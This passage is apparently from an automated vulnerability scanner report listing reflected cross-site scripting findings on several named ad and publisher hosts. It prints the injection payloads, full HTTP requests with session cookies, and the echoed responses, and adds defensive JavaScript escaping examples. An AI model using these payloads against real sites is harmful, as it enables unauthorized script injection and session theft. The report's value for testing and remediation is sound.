Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wIAAAEuOM+rkQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 12:51:28 GMT
Age: 0
Connection: keep-alive
Content-Length: 17188

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
pleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.isp-planet.com/","cfdeb"-alert(1)-"613a5e49d69":"1","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new $iTXT.data.Param($iTXT.glob.dbgParams,undefined,undefined,'CHANNEL');}
...[SNIP]...

3.46. http://isp.thelist.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://isp.thelist.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4d0ed--><script>alert(1)</script>7894299f6b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?4d0ed--><script>alert(1)</script>7894299f6b8=1 HTTP/1.1
Host: isp.thelist.com
Proxy-Connection: keep-alive
Referer: http://www.thelist.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026088464:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.6.10.1298033251

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:29 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:49:29 GMT
Content-Type: text/html
Content-Length: 46040

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /?4d0ed--><script>alert(1)</script>7894299f6b8=1 -->
...[SNIP]...

3.47. http://jlinks.industrybrains.com/jsct [ct parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the application's response. The payload 553d9<script>alert(1)</script>e9cc914bffe was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that the parameter is reflected without encoding. The scanner labels the context as plain text in an HTML document, but the response is served as application/x-javascript and the reflection sits inside a JavaScript line comment (// Error: ...), where a <script> tag is inert when the URL is loaded as a script include. The injected markup becomes XSS only if a browser navigates to the URL directly and renders the body as HTML, which depends on content sniffing; the response carries no X-Content-Type-Options header.

Request

GET /jsct?sid=829&ct=INTERNETCOM_NETWORK_ROS553d9<script>alert(1)</script>e9cc914bffe&tr=ISPPLANET&num=4&layt=2&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 12:47:17 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 18 Feb 2011 12:47:17 GMT
Content-Type: application/x-javascript
Content-Length: 94

// Error: Unknown old section INTERNETCOM_NETWORK_ROS553d9<script>alert(1)</script>e9cc914bffe

3.48. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the application's response. The payload 6b94a<script>alert(1)</script>27ebc1b8b3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that the parameter name is reflected without encoding. The context is not HTML text, though: the reflection is inside a JavaScript line comment (// Error: Unknown parameter ...) in a response served as application/x-javascript, so the <script> tag does nothing when the URL is included as a script and executes only if a browser renders a direct navigation to it as HTML.

Request

GET /jsct?sid=829&ct=INTERNETCOM_NETWORK_ROS&tr=ISPPLANET&num=4&layt=2&fmt=simp&6b94a<script>alert(1)</script>27ebc1b8b3d=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 12:47:38 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 18 Feb 2011 12:47:38 GMT
Content-Type: application/x-javascript
Content-Length: 69

// Error: Unknown parameter 6b94a<script>alert(1)</script>27ebc1b8b3d

3.49. http://jlinks.industrybrains.com/jsct [tr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the tr request parameter is copied into the application's response. The payload 4ab45<script>alert(1)</script>d0043b82960 was submitted in the tr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that the parameter is reflected without encoding. The reflection lands in a JavaScript line comment (// Error: Site 829 has no section ...) in an application/x-javascript response rather than in an HTML document, so the <script> tag is inert as a script include; it matters only on a direct navigation that the browser chooses to render as HTML.

Request

GET /jsct?sid=829&ct=INTERNETCOM_NETWORK_ROS&tr=ISPPLANET4ab45<script>alert(1)</script>d0043b82960&num=4&layt=2&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Feb 2011 12:47:19 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 18 Feb 2011 12:47:19 GMT
Content-Type: application/x-javascript
Content-Length: 84

// Error: Site 829 has no section ISPPLANET4ab45<script>alert(1)</script>d0043b82960

3.50. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the application's response. The payload 81194<script>alert(1)</script>27c159b7bd0 was submitted in the csid parameter. This input was echoed in the application's response converted to upper case, as K0878481194<SCRIPT>ALERT(1)</SCRIPT>27C159B7BD0, not unmodified as the scanner reports.

This proof-of-concept attack demonstrates that the parameter is reflected without encoding. Two caveats: the reflection sits inside a JavaScript block comment (/* ... */) in a response served as application/javascript, so the tag is inert when gw.js is loaded as a script and could only matter if a browser rendered a direct navigation as HTML; and because of the case folding, ALERT(1) would not resolve even then, so any working payload for this sink has to survive being upper-cased.

Request

GET /gateway/gw.js?csid=K0878481194<script>alert(1)</script>27c159b7bd0 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://member.internet.com/index.php?&CCID=20127048203695854&QTR=ZZf0Za20127048Zb0Zg172Zw56Zm0Zc203695854,203695854Zs9544ZZ&CLK=772110218044714989
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=1a484aca566591c53c93394519ccf266; NETSEGS_B08725=3161248fde72e26b&B08725&0&4d80b89b&0&&4d5a0212&383df689f9c2c8ede3ba30f48f38e86; NETSEGS_J08778=3161248fde72e26b&J08778&0&4d80b8c5&0&&4d5b746e&383df689f9c2c8ede3ba30f48f38e86; udm_0=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; NETSEGS_H07710=3161248fde72e26b&H07710&0&4d80b99b&0&&4d59f17b&383df689f9c2c8ede3ba30f48f38e86; rsi_segs_1000000=pUPFOkPF7gMUFq3RgKwyVM+rackiy9FAEQLAqVwoHKDQKQUECTMJ3YH2aKvvUGIZ/k87dlTGDd9rmrYAbh0Ooo1h8N1EtRckRO8D+6zUXBYqtZsYeI3a3nZ/uKCMZlVcBQPHjipQg6Z/Y6xdJbQfIXEXDcuu0jXA0r4EqwZxAebO/H1rbq/oefPid9Abgjtgf1CcStKYcH9pekrGHDTaE0zblx/AXw==; rtc_0=MLsvrF8vcT5jJgGklT7AEDDwQw1KnSMm7aAOGlFl0Rl+KJT2a8F6YiRtSKwh7tchB2APQUwkRaHEYKxI6Ou1zujy8BRV5QH9T2a+M2zGjUX0Viz2yYzyqS+abJbtcJY1AwbkBwWSbrmXeIU8L72BbNEwFLUWnw4D3Y7Z6rQDk61zUtWFZ7FpYbBUhrPYiq8tMbpbnAwfLRKaokvXBfAxTtnkTG6wRnCUf8KvJJldcrEDXlft7E4UKO6JuUKNlWhu56+PoRacb0owT1rR7sedFEbW8MsH3Q==; rsi_us_1000000=pUMd5U+jOAQYbgln1lzSSFtZh+R6jR5rAnxq6o31aLucdIr+/fYe947NQq3oGGNC0Zybw/uBTme9mliOjVrpvW9lNHoIJpyFxXrnW0F9cX836eAs9iauj4qWIcHgL3TFQSA4Z73lqhE12hj3VtzYwKn5RuNOFP7LRbUwPz4hvnepGfgDfqaKm6X2n0jBEr09e5eqjeE4DMGp/EXx11RFPaTHKkydfd12P49fxntHNTIyRRsEHjsEcW0ZNZMQJflrWq6sAf7DgbAWDI3/Jnx+vyTQAJlhAu4mIiNyegI9axT1BuxdhS+919q1H97DZQ3w62bgBkDIYrXY5yQWXZWVejD6/z3ngANs7+FrE223fMrJvxQDoMoY1AHtEmGHWyShN0dYElwJGSqzSkDlCTGkUMGVzLubq3yr8f69CswpcrgOupv2uUWyPGDrXz+H/CH+yTqQRrJs/WX8eWf2B5whRHTQ5MyF5Fexs389R2H/mNLQT4EWR4ogCuCGbXwQqpvdz+F4b9AoViXg4/+yAwREakp5va0FEOKEK1iXnQHPS2qPxJ+QMdnr2WCWzNXFn/6T/1lv6ngf2MDVh/CQUC7RH8fki+WkYGAydtv98aqip51nFCv3HRw03+CFBgpQxvEefja90cfrQCaR3e7eLvOWMWKWKvIlhGlHENQ5cppXhDh7xw+XQtmSizFU+vYcBqwOxwBjqxLxnOzf2WnohHRaJJitjwAQKwt7VJuwGA/CMXXLCzDN7r67fBQq5flzHl6Z12s19p7KB/l8Yr0OhoFjqp6t+u/24QjbXs/toP7ywsjgCrEHD3CQS+bQOwR2zaiqlNFilQ2L/jmAeI6vhjCO1yca/zEJ5su8D6hT7YidV0X4waY/bVBJJ8e5ZwjbBWMv883XIC9h36CnTnbB5pwKO1P5OIvjtDRPNxxYR1HbpyQb7/mAwTKXbuSocx3ex6uAG5M=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Fri, 18 Feb 2011 12:47:17 GMT
Cache-Control: max-age=86400, private
Expires: Sat, 19 Feb 2011 12:47:17 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 12:47:16 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "K0878481194<SCRIPT>ALERT(1)</SCRIPT>27C159B7BD0" was not recognized.
*/
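
The jsct and gw.js findings above all land in a JavaScript comment rather than in HTML. The block below is an added example, not code from industrybrains, Revenue Science or this report. It shows the one thing such a sink must do to stay a comment: strip the ECMAScript line terminators (and, for a block comment, the */ sequence) from the echoed value, and send the headers that stop a direct navigation from being sniffed as HTML. The report does not show whether the live endpoints did this; the value containing a newline is constructed here to show why it matters, and the function names and header set are this example's own.

```javascript
// Added example, not industrybrains/revsci code: keeping an error message
// inside a JavaScript comment. REPORT_SECTION is the ct value from finding
// 3.47; CONSTRUCTED_SECTION is made up for the demonstration.

// A line comment ends at any of the four ECMAScript line terminators, so a
// value that may contain them must lose them before it goes after '// '.
function jsLineCommentSafe(value) {
  return String(value).replace(/[\r\n\u2028\u2029]/g, ' ');
}

// A block comment ends at the first '*/', so that sequence must be broken too.
function jsBlockCommentSafe(value) {
  return jsLineCommentSafe(value).replace(/\*\//g, '* /');
}

// The shape of the jsct response: a line comment built by concatenation.
function renderErrorUnsafe(section) {
  return '// Error: Unknown old section ' + section + '\n';
}
function renderErrorSafe(section) {
  return '// Error: Unknown old section ' + jsLineCommentSafe(section) + '\n';
}

// Headers that keep a browser from rendering a direct navigation to the
// endpoint as HTML, which is the only way markup inside the comment matters.
const SCRIPT_HEADERS = {
  'Content-Type': 'application/javascript; charset=utf-8',
  'X-Content-Type-Options': 'nosniff',
};

// Lines of a script that are not comments, i.e. what an engine would execute.
function codeLines(script) {
  return script
    .split(/[\r\n\u2028\u2029]/)
    .map((l) => l.trim())
    .filter((l) => l && !l.startsWith('//'));
}

const REPORT_SECTION = 'INTERNETCOM_NETWORK_ROS553d9<script>alert(1)</script>e9cc914bffe';
const CONSTRUCTED_SECTION = 'INTERNETCOM_NETWORK_ROS\nalert(1)//';
```

Whether the query-string parser on a given platform ever delivers a raw CR or LF is the question to settle before trusting the comment as a sink; the safe renderer makes the answer irrelevant.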

3.51. http://kona5.kontera.com/KonaGet.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36dc8"%3balert(1)//cbe5ca11ae0 was submitted in the l parameter. This input was echoed as 36dc8";alert(1)//cbe5ca11ae0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the string is an argument of setKonaResults(1,1,"..."), so the payload's ; closes the string before the call's parenthesis is closed and the script as shown is a syntax error: alert(1) does not run. The value is nonetheless written into the string literal unescaped, which is what the finding rests on.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1298042636352&p=14102&k=http%3A//www.palmblvd.com/%3Fe9235--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E627b6f7c09f%3D1jpNNP3&al=1&l=http%3A//www.palmblvd.com/%3Fe9235--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E627b6f7c09f%3D136dc8"%3balert(1)//cbe5ca11ae0&t=Palm+Boulevard+%3A+Newsletters&m1=&rId=0&prev_page=http%3A//burp/show/15&rl=0&1=14&mod=33619970&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.palmblvd.com/?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 1532

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=14102&layout=adlinks&sId=&cb=1298042585&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(1);
reJsonRes
...[SNIP]...

konaRequestId="41737853890776178";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.palmblvd.com/?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=136dc8";alert(1)//cbe5ca11ae0&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");

3.52. http://kona5.kontera.com/KonaGet.js [rId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2a3b"-alert(1)-"30b7d04b7a was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1298042636352&p=14102&k=http%3A//www.palmblvd.com/%3Fe9235--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E627b6f7c09f%3D1jpNNP3&al=1&l=http%3A//www.palmblvd.com/%3Fe9235--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E627b6f7c09f%3D1&t=Palm+Boulevard+%3A+Newsletters&m1=&rId=0d2a3b"-alert(1)-"30b7d04b7a&prev_page=http%3A//burp/show/15&rl=0&1=14&mod=33619970&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.palmblvd.com/?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=8564E29E-394C-11E0-9E36-00163E201081

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 1515

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=14102&layout=adlinks&sId=&cb=1298042588&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(1);
reJsonRes
...[SNIP]...
SearchInfo(47,"http://search.internet.com/query.php?IC_QueryText=#WORD#&IC_QueryDatabase=www.palmboulevard.com");
}, "reaction response");
konaSafe(function(){
konaTweakMode=167854338;
konaRequestId="0d2a3b"-alert(1)-"30b7d04b7a";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.palmblvd.com/?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1&dc_aff_id=");
onKonaReturn(1);
}
...[SNIP]...
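
Findings 3.40, 3.42, 3.45, 3.51 and 3.52 share one sink: request data spliced into a JavaScript literal by string concatenation (an object key in dbgParams.set({...}), the single-quoted pageQuery string, the double-quoted konaRequestId, and the setKonaResults argument). The block below is an added example, not code from intellitxt, Kontera or this report. It rebuilds three of those response lines from parsed parameters, first the way the responses above do and then with a serializer that escapes for script context, and evaluates each against stub globals to show which versions parse and which reach alert. The inputs are copied from 3.42, 3.45 and 3.52; the key in CONSTRUCTED_PARAMS is made up to stand in for the scanner's "-alert(1)-" payload, which is a syntax error in key position. Function names are this example's own.

```javascript
// Added example, not intellitxt/Kontera code: serializing request data into
// JavaScript string and object literals instead of concatenating it. Inputs
// are copied from findings 3.42, 3.45 and 3.52 except CONSTRUCTED_PARAMS.

// JSON.stringify escapes quotes, backslashes and control characters. The extra
// replacements keep the literal safe if the script is ever inlined in HTML
// ("</script>", "<!--") and on engines that treat U+2028/U+2029 as line
// terminators inside a string.
function escapeForScript(json) {
  return json
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}
function jsStringLiteral(value) {
  return escapeForScript(JSON.stringify(String(value)));
}
function jsObjectLiteral(obj) {
  return escapeForScript(JSON.stringify(obj));
}

// The three vulnerable shapes on this page, rebuilt by concatenation: an object
// key in dbgParams.set({...}) (3.40, 3.45), the single-quoted pageQuery string
// (3.42) and the double-quoted konaRequestId (3.52).
function renderUnsafe(params, rawQuery, requestId) {
  const pairs = Object.entries(params).map(([k, v]) => '"' + k + '":"' + v + '"');
  return [
    '$iTXT.glob.dbgParams.set({' + pairs.join(',') + '},null,60);',
    "$iTXT.js.pageQuery='" + rawQuery + "';",
    'konaRequestId="' + requestId + '";',
  ].join('\n');
}

// Same three lines with every untrusted value serialized.
function renderSafe(params, rawQuery, requestId) {
  return [
    '$iTXT.glob.dbgParams.set(' + jsObjectLiteral(params) + ',null,60);',
    '$iTXT.js.pageQuery=' + jsStringLiteral(rawQuery) + ';',
    'konaRequestId=' + jsStringLiteral(requestId) + ';',
  ].join('\n');
}

// Demonstration harness: evaluate a rendered script against stub globals and
// report whether it parsed, what it called and what values it stored.
function evaluate(script) {
  const calls = [];
  const $iTXT = { glob: { dbgParams: { set: (o) => calls.push(['set', o]) } }, js: {} };
  const alert = (x) => calls.push(['alert', x]);
  try {
    const run = new Function('$iTXT', 'alert',
      'var konaRequestId;\n' + script + '\nreturn [$iTXT.js.pageQuery, konaRequestId];');
    const [pageQuery, requestId] = run($iTXT, alert);
    return { parsed: true, calls, pageQuery, requestId };
  } catch (e) {
    return { parsed: !(e instanceof SyntaxError), calls, error: e.name };
  }
}

// Finding 3.45: the parameter name becomes the key. The scanner's "-alert(1)-"
// payload is a syntax error in that position.
const REPORT_PARAMS = {
  pagecl: '38124',
  refurl: 'http://www.isp-planet.com/',
  'cfdeb"-alert(1)-"613a5e49d69': '1',
  cc: 'us',
};
// Constructed: a key that closes itself and supplies alert(1) as the value.
const CONSTRUCTED_PARAMS = { pagecl: '38124', 'x":alert(1),"y': '1', cc: 'us' };
// Finding 3.42: the raw query string.
const REPORT_QUERY = "ipid=26025&fbfda'-alert(1)-'069187f932f=1";
// Finding 3.52: the rId value.
const REPORT_REQUEST_ID = '0d2a3b"-alert(1)-"30b7d04b7a';
```

With the serialized version the injected key survives as data: dbgParams.set receives an object whose key is literally cfdeb"-alert(1)-"613a5e49d69, pageQuery holds the raw query string, and nothing outside the intended call runs.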

3.53. http://member.internet.com/cookie_class.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://member.internet.com
Path:   /cookie_class.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ca4a"><script>alert(1)</script>3bbcce52da1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4ca4a"><script>alert(1)</script>3bbcce52da1?v=df32f76fa6fa8754bd6541fbadfecfe211e5e258bcf020cb52e7a9e01ff3686a0edfe7667c06596631975dce2bb7dde8d8d152e9f519c68a2e56c43d18985ca6 HTTP/1.1
Host: member.internet.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801a81gABvEW; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="tinfo" value="/4ca4a"><script>alert(1)</script>3bbcce52da1">
...[SNIP]...

3.54. http://member.internet.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://member.internet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2143c"><script>alert(1)</script>236f6fe04f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico2143c"><script>alert(1)</script>236f6fe04f8 HTTP/1.1
Host: member.internet.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801a81gABvEW; RMAM=01TFSM_1700.4fWHbZaG|; PHPSESSID=368403e253d2cea987fe9303f109d57f; __utmz=175186238.1298033268.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026071106:ss=1298026071106; __utma=175186238.1586971603.1298033268.1298033268.1298033268.1; __utmc=175186238; __utmb=175186238.3.10.1298033268; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=221%3D12715%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:50:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="tinfo" value="/favicon.ico2143c"><script>alert(1)</script>236f6fe04f8">
...[SNIP]...

3.55. http://pdastreet.us.intellitxt.com/al.asp [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pdastreet.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5b734%3balert(1)//79a8a9bd1be was submitted in the jscallback parameter. This input was echoed as 5b734;alert(1)//79a8a9bd1be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

